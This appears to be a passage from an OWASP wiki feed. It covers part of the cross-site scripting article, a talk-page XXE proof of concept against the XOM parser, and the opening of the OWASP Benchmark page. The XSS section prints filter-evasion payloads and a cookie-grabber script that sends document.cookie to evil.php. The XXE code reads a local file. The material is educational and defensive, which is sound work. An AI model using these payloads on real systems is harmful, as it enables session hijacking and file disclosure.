In addition to Stored and Reflected XSS, another type of XSS, [[DOM Based XSS]] was identified by [http://www.webappsec.org/projects/articles/071105.shtml Amit Klein in 2005]. OWASP recommends the XSS categorization as described in the OWASP Article: [[Types of Cross-Site Scripting]], which covers all these XSS terms, organizing them into a matrix of Stored vs. Reflected XSS and Server vs. Client XSS, where DOM Based XSS is a subset of Client XSS.&lt;br /&gt;
&lt;br /&gt;
====XSS Attack Consequences====&lt;br /&gt;
The consequence of an XSS attack is the same regardless of whether it is stored or reflected ([[DOM Based XSS |or DOM Based]]). The difference is in how the payload arrives at the server. Do not be fooled into thinking that a “read-only” or “brochureware” site is not vulnerable to serious reflected XSS attacks. XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. The most severe XSS attacks involve disclosure of the user’s session cookie, allowing an attacker to hijack the user’s session and take over the account. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirect the user to some other page or site, or modify presentation of content. An XSS vulnerability allowing an attacker to modify a press release or news item could affect a company’s stock price or lessen consumer confidence. An XSS vulnerability on a pharmaceutical site could allow an attacker to modify dosage information resulting in an overdose. For more information on these types of attacks see [[Content_Spoofing]].&lt;br /&gt;
&lt;br /&gt;
===How to Determine If You Are Vulnerable===&lt;br /&gt;
XSS flaws can be difficult to identify and remove from a web application. The best way to find flaws is to perform a security review of the code and search for all places where input from an HTTP request could possibly make its way into the HTML output. Note that a variety of different HTML tags can be used to transmit a malicious JavaScript. Nessus, Nikto, and some other available tools can help scan a website for these flaws, but can only scratch the surface. If one part of a website is vulnerable, there is a high likelihood that there are other problems as well.&lt;br /&gt;
&lt;br /&gt;
===How to Protect Yourself===&lt;br /&gt;
The primary defenses against XSS are described in the [[XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet |OWASP XSS Prevention Cheat Sheet]].&lt;br /&gt;
&lt;br /&gt;
Also, it's crucial that you turn off HTTP TRACE support on all web servers. An attacker can steal cookie data via Javascript even when document.cookie is disabled or not supported by the client. This attack is mounted when a user posts a malicious script to a forum so when another user clicks the link, an asynchronous HTTP Trace call is triggered which collects the user's cookie information from the server, and then sends it over to another malicious server that collects the cookie information so the attacker can mount a session hijack attack. This is easily mitigated by removing support for HTTP TRACE on all web servers.&lt;br /&gt;
&lt;br /&gt;
The [[ESAPI |OWASP ESAPI project]] has produced a set of reusable security components in several languages, including validation and escaping routines to prevent parameter tampering and the injection of XSS attacks. In addition, the [[:Category:OWASP WebGoat Project|OWASP WebGoat Project]] training application has lessons on Cross-Site Scripting and data encoding.&lt;br /&gt;
&lt;br /&gt;
===Alternate XSS Syntax===&lt;br /&gt;
====XSS using Script in Attributes====&lt;br /&gt;
&lt;br /&gt;
XSS attacks may be conducted without using &amp;lt;script&amp;gt;&amp;lt;/script&amp;gt; tags.&lt;br /&gt;
Other tags will do exactly the same thing, for example:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;body onload=alert('test1')&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
or other attributes like: onmouseover, onerror.&lt;br /&gt;
&lt;br /&gt;
onmouseover&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;b onmouseover=alert('Wufff!')&amp;gt;click me!&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
onerror&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;http://url.to.file.which/not.exist&amp;quot; onerror=alert(document.cookie);&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====XSS using Script Via Encoded URI Schemes====&lt;br /&gt;
&lt;br /&gt;
If we need to hide against web application filters we may try to encode string characters, e.g.: a=&amp;amp;#X41 (UTF-8) and use it in&lt;br /&gt;
IMG tag:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=j&amp;amp;#X41vascript:alert('test2')&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
There are many different UTF-8 encoding notations what give us even more possibilities.&lt;br /&gt;
&lt;br /&gt;
====XSS using code encoding====&lt;br /&gt;
&lt;br /&gt;
We may encode our script in base64 and place it in META tag. This way we get rid of alert() totally. More information about this method can be found in RFC 2397&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot;&lt;br /&gt;
CONTENT=&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
These and others examples can be found at the OWASP [[XSS Filter Evasion Cheat Sheet]] which is a true encyclopedia of the alternate XSS syntax attack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!--==Risk Factors==&lt;br /&gt;
TBD&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Examples ==&lt;br /&gt;
&lt;br /&gt;
Cross-site scripting attacks may occur anywhere that possibly malicious users are allowed to post unregulated material to a trusted website for the consumption of other valid users.&lt;br /&gt;
&lt;br /&gt;
The most common example can be found in bulletin-board websites which provide web based mailing list-style functionality. &lt;br /&gt;
&lt;br /&gt;
===Example 1=== &lt;br /&gt;
&lt;br /&gt;
The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
	&amp;lt;% String eid = request.getParameter(&amp;quot;eid&amp;quot;); %&amp;gt; &lt;br /&gt;
	...&lt;br /&gt;
	Employee ID: &amp;lt;%= eid %&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The code in this example operates correctly if eid contains only standard alphanumeric text. If eid has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response.&lt;br /&gt;
&lt;br /&gt;
Initially, this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers. This mechanism of exploiting vulnerable web applications is known as Reflected XSS.&lt;br /&gt;
&lt;br /&gt;
===Example 2===&lt;br /&gt;
&lt;br /&gt;
The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee's name.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
	&amp;lt;%... &lt;br /&gt;
	 Statement stmt = conn.createStatement();&lt;br /&gt;
	 ResultSet rs = stmt.executeQuery(&amp;quot;select * from emp where id=&amp;quot;+eid);&lt;br /&gt;
	 if (rs != null) {&lt;br /&gt;
	  rs.next(); &lt;br /&gt;
	  String name = rs.getString(&amp;quot;name&amp;quot;);&lt;br /&gt;
	%&amp;gt;&lt;br /&gt;
	&lt;br /&gt;
	Employee Name: &amp;lt;%= name %&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
As in Example 1, this code functions correctly when the values of name are well-behaved, but it does nothing to prevent exploits if they are not. Again, this code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user's web browser. This type of exploit, known as Stored XSS, is particularly insidious because the indirection caused by the data store makes it more difficult to identify the threat and increases the possibility that the attack will affect multiple users. XSS got its start in this form with websites that offered a &amp;quot;guestbook&amp;quot; to visitors. Attackers would include JavaScript in their guestbook entries, and all subsequent visitors to the guestbook page would execute the malicious code.&lt;br /&gt;
&lt;br /&gt;
As the examples demonstrate, XSS vulnerabilities are caused by code that includes unvalidated data in an HTTP response. There are three vectors by which an XSS attack can reach a victim:&lt;br /&gt;
&lt;br /&gt;
* As in Example 1, data is read directly from the HTTP request and reflected back in the HTTP response. Reflected XSS exploits occur when an attacker causes a user to supply dangerous content to a vulnerable web application, which is then reflected back to the user and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces victims to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the user, the content is executed and proceeds to transfer private information, such as cookies that may include session information, from the user's machine to the attacker or perform other nefarious activities. &lt;br /&gt;
* As in Example 2, the application stores dangerous data in a database or other trusted data store. The dangerous data is subsequently read back into the application and included in dynamic content. Stored XSS exploits occur when an attacker injects dangerous content into a data store that is later read and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. &lt;br /&gt;
* A source outside the application stores dangerous data in a database or other data store, and the dangerous data is subsequently read back into the application as trusted data and included in dynamic content. &lt;br /&gt;
&lt;br /&gt;
=== Attack Examples ===&lt;br /&gt;
&lt;br /&gt;
'''Example 1: Cookie Grabber'''&lt;br /&gt;
&lt;br /&gt;
If the application doesn't validate the input data, the attacker can easily steal a cookie from an authenticated user. All the attacker has to do is to place the following code in any posted input(ie: message boards, private messages, user profiles):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT type=&amp;quot;text/javascript&amp;quot;&amp;gt;&lt;br /&gt;
var adr = '../evil.php?cakemonster=' + escape(document.cookie);&lt;br /&gt;
&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The above code will pass an escaped content of the cookie (according to RFC content must be escaped before sending it via HTTP protocol with GET method) to the evil.php script in &amp;quot;cakemonster&amp;quot; variable. The attacker then checks the results of his evil.php script (a cookie grabber script will usually write the cookie to a file) and use it.&lt;br /&gt;
&lt;br /&gt;
===Error Page Example===&lt;br /&gt;
&lt;br /&gt;
Let's assume that we have an error page, which is handling requests for a non existing pages, a classic 404 error&lt;br /&gt;
page. We may use the code below as an example to inform user about what specific page is missing:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
&amp;lt;body&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;? php&lt;br /&gt;
print &amp;quot;Not found: &amp;quot; . urldecode($_SERVER[&amp;quot;REQUEST_URI&amp;quot;]);&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Let's see how it works:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
http://testsite.test/file_which_not_exist&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
In response we get:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Not found: /file_which_not_exist&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Now we will try to force the error page to include our code:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
http://testsite.test/&amp;lt;script&amp;gt;alert(&amp;quot;TEST&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
The result is:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Not found: / (but with JavaScript code &amp;lt;script&amp;gt;alert(&amp;quot;TEST&amp;quot;);&amp;lt;/script&amp;gt;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
We have successfully injected the code, our XSS! What does it mean? For example, that we&lt;br /&gt;
may use this flaw to try to steal a user's session cookie.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!--==Related [[Threat Agents]]==&lt;br /&gt;
* TBD&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Related [[Attacks]]==&lt;br /&gt;
* [[XSS Attacks]]&lt;br /&gt;
* [[:Category:Injection Attack]]&lt;br /&gt;
* [[Invoking untrusted mobile code]]&lt;br /&gt;
* [[Cross Site History Manipulation (XSHM)]]&lt;br /&gt;
&lt;br /&gt;
==Related [[Vulnerabilities]]==&lt;br /&gt;
* [[:Category:Input Validation Vulnerability]]&lt;br /&gt;
* [[Cross Site Scripting Flaw]]&lt;br /&gt;
* [[Types of Cross-Site Scripting]]&lt;br /&gt;
&lt;br /&gt;
==Related [[Controls]]==&lt;br /&gt;
* [[:Category:Input Validation]]&lt;br /&gt;
* [[HTML Entity Encoding]]&lt;br /&gt;
* [[Output Validation]]&lt;br /&gt;
* [[Canonicalization]]&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
* OWASP's [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]&lt;br /&gt;
* OWASP Guide to Building Secure Web Applications and Web Services, Chapter 8: [[Data_Validation|Data Validation]]&lt;br /&gt;
* OWASP Testing Guide, [[Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001)]] &lt;br /&gt;
* OWASP Testing Guide, [[Testing_for_Stored_Cross_site_scripting_(OWASP-DV-002)]] &lt;br /&gt;
* OWASP Testing Guide, [[Testing_for_DOM-based_Cross_site_scripting_(OWASP-DV-003)]]&lt;br /&gt;
* OWASP's [[How_to_Build_an_HTTP_Request_Validation_Engine_for_Your_J2EE_Application|How to Build an HTTP Request Validation Engine (J2EE validation using OWASP's Stinger)]] &lt;br /&gt;
* Google Code Best Practice Guide: http://code.google.com/p/doctype/wiki/ArticlesXSS&lt;br /&gt;
* The Cross Site Scripting FAQ: http://www.cgisecurity.com/articles/xss-faq.shtml &lt;br /&gt;
* OWASP [[XSS Filter Evasion Cheat Sheet]]&lt;br /&gt;
* CERT Advisory on Malicious HTML Tags: http://www.cert.org/advisories/CA-2000-02.html &lt;br /&gt;
* CERT “Understanding Malicious Content Mitigation” http://www.cert.org/tech_tips/malicious_code_mitigation.html &lt;br /&gt;
* Understanding the cause and effect of CSS Vulnerabilities: http://www.technicalinfo.net/papers/CSS.html &lt;br /&gt;
* XSSed - Cross-Site Scripting (XSS) Information and Mirror Archive of Vulnerable Websites http://www.xssed.com&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:Injection]]&lt;br /&gt;
[[Category:OWASP Top Ten Project]]&lt;br /&gt;
[[Category:Code Snippet]]&lt;br /&gt;
[[Category:Security Focus Area]]&lt;br /&gt;
[[Category:Attack]]&lt;br /&gt;
[[Category:Popular]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Talk:XML_External_Entity_(XXE)_Prevention_Cheat_Sheet&amp;diff=232049</id>
		<title>Talk:XML External Entity (XXE) Prevention Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Talk:XML_External_Entity_(XXE)_Prevention_Cheat_Sheet&amp;diff=232049"/>
				<updated>2017-08-07T17:05:53Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Problematic mitigation advice&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The following code suffers from XXE despite the [[XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#XMLReader|XMLReader recommendations in OWASP]] that these '''setFeatures''' would resolve it.&lt;br /&gt;
&lt;br /&gt;
However, this is not true for XOM.nu (tested on version 1.2.5), a third party XML plugin. I don't know how popular it is, but it is used by Jenkins. Not implying Jenkins is vulnerable, merely that a lib it uses doesn't have proper OWASP usage recommendation.&lt;br /&gt;
&lt;br /&gt;
Anyway, assuming the content of c:\test.txt is &amp;quot;'''This is TEXT inside the file C:\test.txt'''&amp;quot;&lt;br /&gt;
&lt;br /&gt;
    import java.io.InputStream;&lt;br /&gt;
    import org.apache.commons.io.IOUtils;&lt;br /&gt;
    import org.dom4j.io.SAXReader;&lt;br /&gt;
    import org.xml.sax.XMLReader;&lt;br /&gt;
    import org.xml.sax.helpers.XMLReaderFactory;&lt;br /&gt;
    &lt;br /&gt;
    import nu.xom.*;&lt;br /&gt;
    public class helloworld {&lt;br /&gt;
           public static void main(String[] args) throws Exception {&lt;br /&gt;
                  &lt;br /&gt;
                  //To get this to run, the file c:\test.txt must exist and have content. alternatively, change the path in &amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///[file]&amp;quot; &lt;br /&gt;
                  String newline = System.getProperty(&amp;quot;line.separator&amp;quot;);&lt;br /&gt;
                  String xml = &amp;quot;&amp;lt;?xml version=\&amp;quot;1.0\&amp;quot; encoding=\&amp;quot;UTF-8\&amp;quot; standalone=\&amp;quot;yes\&amp;quot;?&amp;gt;&amp;quot; + newline +&lt;br /&gt;
                               &amp;quot;&amp;lt;!DOCTYPE bar [&amp;quot; + newline +&lt;br /&gt;
                               &amp;quot;&amp;lt;!ENTITY xxe SYSTEM \&amp;quot;file:///c:/test.txt\&amp;quot;&amp;gt;&amp;quot; + newline +&lt;br /&gt;
                               &amp;quot;]&amp;gt;&amp;quot; + newline +&lt;br /&gt;
                               &amp;quot;&amp;lt;book&amp;gt;&amp;quot;+ newline +&lt;br /&gt;
                               &amp;quot;&amp;lt;author&amp;gt;&amp;amp;xxe;&amp;lt;/author&amp;gt;&amp;quot;+ newline +&lt;br /&gt;
                               &amp;quot;&amp;lt;isbn&amp;gt;11112222333&amp;lt;/isbn&amp;gt;&amp;quot;+ newline +&lt;br /&gt;
                               &amp;quot;&amp;lt;title&amp;gt;The Great Big Useless Book of XMLs&amp;lt;/title&amp;gt;&amp;quot;+ newline +&lt;br /&gt;
                               &amp;quot;&amp;lt;/book&amp;gt;&amp;quot;;          // Vulnerable XOM Parser  &lt;br /&gt;
                  XMLReader xerces = XMLReaderFactory.createXMLReader();&lt;br /&gt;
                  //xerces.setFeature(&amp;quot;http://apache.org/xml/features/disallow-doctype-decl&amp;quot;, true);&lt;br /&gt;
                  xerces.setFeature(&amp;quot;http://xml.org/sax/features/external-general-entities&amp;quot;, false);&lt;br /&gt;
                  xerces.setFeature(&amp;quot;http://xml.org/sax/features/external-parameter-entities&amp;quot;, false);&lt;br /&gt;
              &lt;br /&gt;
    xerces.setFeature(&amp;quot;http://apache.org/xml/features/nonvalidating/load-&lt;br /&gt;
    external-dtd&amp;quot;,false);&lt;br /&gt;
                  Builder b = new Builder(xerces);&lt;br /&gt;
                  InputStream is2 = IOUtils.toInputStream(xml, &amp;quot;UTF-8&amp;quot;);&lt;br /&gt;
                  Document d = b.build(is2);&lt;br /&gt;
                  System.out.println(&amp;quot;XOM Reader: &amp;quot; + d.getValue());&lt;br /&gt;
        }&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Output:'''&lt;br /&gt;
XOM Reader: &lt;br /&gt;
This is TEXT inside the file C:\test.txt&lt;br /&gt;
11112222333&lt;br /&gt;
The Great Big Useless Book of XMLs&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
However, by uncommenting&lt;br /&gt;
    //xerces.setFeature(&amp;quot;http://apache.org/xml/features/disallow-doctype-decl&amp;quot;, true);&lt;br /&gt;
a ''''nu.xom.ParsingException'''' is thrown for this XML, preventing exploitation.&lt;br /&gt;
&lt;br /&gt;
This leads us (Checkmarx Research Group) to believe the recommendations in OWASP for XMLReader are partial; We actually advise removing direct explicit recommendations entirely and demand devs to adhere to specific platform best practices and documentation, instead.&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Benchmark&amp;diff=232001</id>
		<title>Benchmark</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Benchmark&amp;diff=232001"/>
				<updated>2017-08-03T09:13:48Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: /* Checkmarx */ changed a synonym&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Main = &lt;br /&gt;
 &amp;lt;div style=&amp;quot;width:100%;height:100px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:Incubator_big.jpg|link=OWASP_Project_Stages#tab.3DLab_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== OWASP Benchmark Project  ==&lt;br /&gt;
The OWASP Benchmark for Security Automation (OWASP Benchmark) is a free and open test suite designed to evaluate the speed, coverage, and accuracy of automated software vulnerability detection tools and services (henceforth simply referred to as 'tools'). Without the ability to measure these tools, it is difficult to understand their strengths and weaknesses, and compare them to each other. Each version of the OWASP Benchmark contains thousands of test cases that are fully runnable and exploitable, each of which maps to the appropriate CWE number for that vulnerability.&lt;br /&gt;
&lt;br /&gt;
You can use the OWASP Benchmark with [[Source_Code_Analysis_Tools | Static Application Security Testing (SAST)]] tools, [[:Category:Vulnerability_Scanning_Tools | Dynamic Application Security Testing (DAST)]] tools like OWASP [[ZAP]] and Interactive Application Security Testing (IAST) tools. The current version of the Benchmark is implemented in Java.  Future versions may expand to include other languages.&lt;br /&gt;
&lt;br /&gt;
==Benchmark Project Scoring Philosophy==&lt;br /&gt;
&lt;br /&gt;
Security tools (SAST, DAST, and IAST) are amazing when they find a complex vulnerability in your code.  But with widespread misunderstanding of the specific vulnerabilities automated tools cover, end users are often left with a false sense of security.&lt;br /&gt;
&lt;br /&gt;
We are on a quest to measure just how good these tools are at discovering and properly diagnosing security problems in applications. We rely on the [http://en.wikipedia.org/wiki/Receiver_operating_characteristic long history] of military and medical evaluation of detection technology as a foundation for our research. Therefore, the test suite tests both real and fake vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
There are four possible test outcomes in the Benchmark:&lt;br /&gt;
&lt;br /&gt;
# Tool correctly identifies a real vulnerability (True Positive - TP)&lt;br /&gt;
# Tool fails to identify a real vulnerability (False Negative - FN)&lt;br /&gt;
# Tool correctly ignores a false alarm (True Negative - TN)&lt;br /&gt;
# Tool fails to ignore a false alarm (False Positive - FP)&lt;br /&gt;
&lt;br /&gt;
We can learn a lot about a tool from these four metrics. Consider a tool that simply flags every line of code as vulnerable. This tool will perfectly identify all vulnerabilities!  But it will also have 100% false positives and thus adds no value.  Similarly, consider a tool that reports absolutely nothing. This tool will have zero false positives, but will also identify zero real vulnerabilities and is also worthless. You can even imagine a tool that flips a coin to decide whether to report whether each test case contains a vulnerability. The result would be 50% true positives and 50% false positives.  We need a way to distinguish valuable security tools from these trivial ones.&lt;br /&gt;
&lt;br /&gt;
If you imagine the line that connects all these points, from 0,0 to 100,100 establishes a line that roughly translates to &amp;quot;random guessing.&amp;quot; The ultimate measure of a security tool is how much better it can do than this line.  The diagram below shows how we will evaluate security tools against the Benchmark.&lt;br /&gt;
&lt;br /&gt;
[[File:Wbe guide.png]]&lt;br /&gt;
&lt;br /&gt;
A point plotted on this chart provides a visual indication of how well a tool did considering both the True Positives the tool reported, as well as the False Positives it reported. We also want to compute an individual score for that point in the range 0 - 100, which we call the Benchmark Accuracy Score.&lt;br /&gt;
&lt;br /&gt;
The Benchmark Accuracy Score is essentially a [https://en.wikipedia.org/wiki/Youden%27s_J_statistic Youden Index], which is a standard way of summarizing the accuracy of a set of tests.  Youden's index is one of the oldest measures for diagnostic accuracy. It is also a global measure of a test performance, used for the evaluation of overall discriminative power of a diagnostic procedure and for comparison of this test with other tests. Youden's index is calculated by deducting 1 from the sum of a test’s sensitivity and specificity expressed not as percentage but as a part of a whole number: (sensitivity + specificity) – 1. For a test with poor diagnostic accuracy, Youden's index equals 0, and in a perfect test Youden's index equals 1.&lt;br /&gt;
&lt;br /&gt;
  So for example, if a tool has a True Positive Rate (TPR) of .98 (i.e., 98%) &lt;br /&gt;
    and False Positive Rate (FPR) of .05 (i.e., 5%)&lt;br /&gt;
  Sensitivity = TPR (.98)&lt;br /&gt;
  Specificity = 1-FPR (.95)&lt;br /&gt;
  So the Youden Index is (.98+.95) - 1 = .93&lt;br /&gt;
  &lt;br /&gt;
  And this would equate to a Benchmark score of 93 (since we normalize this to the range 0 - 100)&lt;br /&gt;
&lt;br /&gt;
On the graph, the Benchmark Score is the length of the line from the point down to the diagonal “guessing” line. Note that a Benchmark score can actually be negative if the point is below the line. This is caused when the False Positive Rate is actually higher than the True Positive Rate.&lt;br /&gt;
&lt;br /&gt;
==Benchmark Validity==&lt;br /&gt;
&lt;br /&gt;
The Benchmark tests are not exactly like real applications. The tests are derived from coding patterns observed in real applications, but the majority of them are considerably '''simpler''' than real applications. That is, most real world applications will be considerably harder to successfully analyze than the OWASP Benchmark Test Suite. Although the tests are based on real code, it is possible that some tests may have coding patterns that don't occur frequently in real code.&lt;br /&gt;
&lt;br /&gt;
Remember, we are trying to test the capabilities of the tools and make them explicit, so that users can make informed decisions about what tools to use, how to use them, and what results to expect.  This is exactly aligned with the OWASP mission to make application security visible.&lt;br /&gt;
&lt;br /&gt;
==Generating Benchmark Scores==&lt;br /&gt;
&lt;br /&gt;
Anyone can use this Benchmark to evaluate vulnerability detection tools. The basic steps are:&lt;br /&gt;
# Download the Benchmark from github&lt;br /&gt;
# Run your tools against the Benchmark&lt;br /&gt;
# Run the BenchmarkScore tool on the reports from your tools&lt;br /&gt;
&lt;br /&gt;
That's it!&lt;br /&gt;
&lt;br /&gt;
Full details on how to do this are at the bottom of the page on the Quick_Start tab.&lt;br /&gt;
&lt;br /&gt;
We encourage both vendors, open source tools, and end users to verify their application security tools against the Benchmark. In order to ensure that the results are fair and useful, we ask that you follow a few simple rules when publishing results. We won't recognize any results that aren't easily reproducible:&lt;br /&gt;
&lt;br /&gt;
# A description of the default “out-of-the-box” installation, version numbers, etc…&lt;br /&gt;
# Any and all configuration, tailoring, onboarding, etc… performed to make the tool run&lt;br /&gt;
# Any and all changes to default security rules, tests, or checks used to achieve the results&lt;br /&gt;
# Easily reproducible steps to run the tool&lt;br /&gt;
&lt;br /&gt;
== Reporting Format==&lt;br /&gt;
&lt;br /&gt;
The Benchmark includes tools to interpret raw tool output, compare it to the expected results, and generate summary charts and graphs. We use the following table format in order to capture all the information generated during the evaluation.&lt;br /&gt;
 &lt;br /&gt;
{| class=&amp;quot;wikitable nowraplinks&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;background:#DDDDDD&amp;quot; | Security Category&lt;br /&gt;
! TP&lt;br /&gt;
! FN&lt;br /&gt;
! TN&lt;br /&gt;
! FP&lt;br /&gt;
! style=&amp;quot;background:#DDDDDD&amp;quot; | Total&lt;br /&gt;
! TPR&lt;br /&gt;
! FPR&lt;br /&gt;
! style=&amp;quot;background:#DDDDDD&amp;quot; | Score&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;background:#DDDDDD&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;11%&amp;quot;| General security category for test cases.&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; width=&amp;quot;11%&amp;quot;| '''True Positives''': Tests with real vulnerabilities that were correctly reported as vulnerable by the tool.&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; width=&amp;quot;11%&amp;quot;| '''False Negative''': Tests with real vulnerabilities that were not correctly reported as vulnerable by the tool.&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; width=&amp;quot;11%&amp;quot;| '''True Negative''': Tests with fake vulnerabilities that were correctly not reported as vulnerable by the tool.&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; width=&amp;quot;11%&amp;quot;| '''False Positive''':Tests with fake vulnerabilities that were incorrectly reported as vulnerable by the tool.&lt;br /&gt;
| style=&amp;quot;background:#DDDDDD&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;11%&amp;quot;| Total test cases for this category.&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; width=&amp;quot;11%&amp;quot;| '''True Positive Rate''': TP / ( TP + FN ) - Also referred to as Precision, as defined at [https://en.wikipedia.org/wiki/Precision_and_recall Wikipedia].&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; width=&amp;quot;11%&amp;quot;| '''False Positive Rate''': FP / ( FP + TN ).&lt;br /&gt;
| style=&amp;quot;background:#DDDDDD&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;11%&amp;quot;| Normalized distance from the “guess line” TPR - FPR.&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;background:#DDDDDD&amp;quot; | Command Injection&lt;br /&gt;
| ...&lt;br /&gt;
| ...&lt;br /&gt;
| ...&lt;br /&gt;
| ...&lt;br /&gt;
| style=&amp;quot;background:#DDDDDD&amp;quot; | ...&lt;br /&gt;
| ...&lt;br /&gt;
| ...&lt;br /&gt;
| style=&amp;quot;background:#DDDDDD&amp;quot; | ...&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;background:#DDDDDD&amp;quot; | Etc...&lt;br /&gt;
| ...&lt;br /&gt;
| ...&lt;br /&gt;
| ...&lt;br /&gt;
| ...&lt;br /&gt;
| style=&amp;quot;background:#DDDDDD&amp;quot; | ...&lt;br /&gt;
| ...&lt;br /&gt;
| ...&lt;br /&gt;
| style=&amp;quot;background:#DDDDDD&amp;quot; | ...&lt;br /&gt;
|-&lt;br /&gt;
